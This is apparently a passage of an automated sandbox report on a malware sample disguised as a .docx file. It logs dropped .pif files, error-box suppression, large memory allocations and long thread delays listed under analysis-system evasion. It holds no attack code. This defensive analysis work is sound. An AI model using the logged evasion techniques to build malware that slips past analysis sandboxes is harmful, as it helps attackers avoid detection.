          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Allocates many large memory junks
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29C0000 memory commit 500006912Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29C1000 memory commit 500178944Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29EC000 memory commit 500002816Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 29ED000 memory commit 500199424Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 2A1E000 memory commit 501014528Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 2B16000 memory commit 500006912Jump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeMemory allocated: 2B18000 memory commit 500015104Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2940000 memory commit 500006912Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2941000 memory commit 500178944Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 296C000 memory commit 500002816Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 296D000 memory commit 500199424Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 299E000 memory commit 501014528Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2A96000 memory commit 500006912Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2A98000 memory commit 500015104Jump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD0000 memory commit 500006912
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD1000 memory commit 500178944
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AFC000 memory commit 500002816
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AFD000 memory commit 500199424
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2B2E000 memory commit 501014528
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2C26000 memory commit 500006912
          Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2C28000 memory commit 500015104
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 1CDB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 1D2F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 1D070000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 340F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 34550000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 341B0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 307E0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 30D70000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 30AD0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599219Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598985Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598870Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598750Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598406Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598297Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598188Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598063Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597813Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597469Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597359Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597250Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597140Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597024Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596907Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596782Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596657Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596313Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596188Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596063Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595828Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595718Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595391Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595157Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595032Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594907Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594797Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594688Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594563Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594313Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599325Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599203Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598984Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598765Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598407Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598296Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598061Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597891Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597767Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597655Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597539Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597328Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597203Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596969Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596625Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596485Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596375Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596156Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596047Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595828Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595715Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595594Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595484Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595375Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595033Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594719Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594532Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594407Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594282Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594157Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594032Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593922Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599765
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599515
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599405
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599282
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599000
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598795
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598686
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598577
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598453
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598343
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598234
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598124
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598015
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597906
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597796
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597687
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597578
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597468
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597359
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597250
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597140
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597031
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596921
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596812
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596703
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596586
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596484
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596374
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596265
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596156
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596046
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595937
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595827
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595718
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595609
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595500
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595390
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595281
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595171
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595062
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594953
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594843
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594734
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594625
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594515
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594406
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594296
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594187
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 1250Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 8583Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 2401Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 7433Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 6831
          Source: C:\Users\Public\Libraries\xzeheenC.pifWindow / User API: threadDelayed 3013
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -31359464925306218s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 6756Thread sleep count: 1250 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 6756Thread sleep count: 8583 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599656s >= -30000sJump to behavior
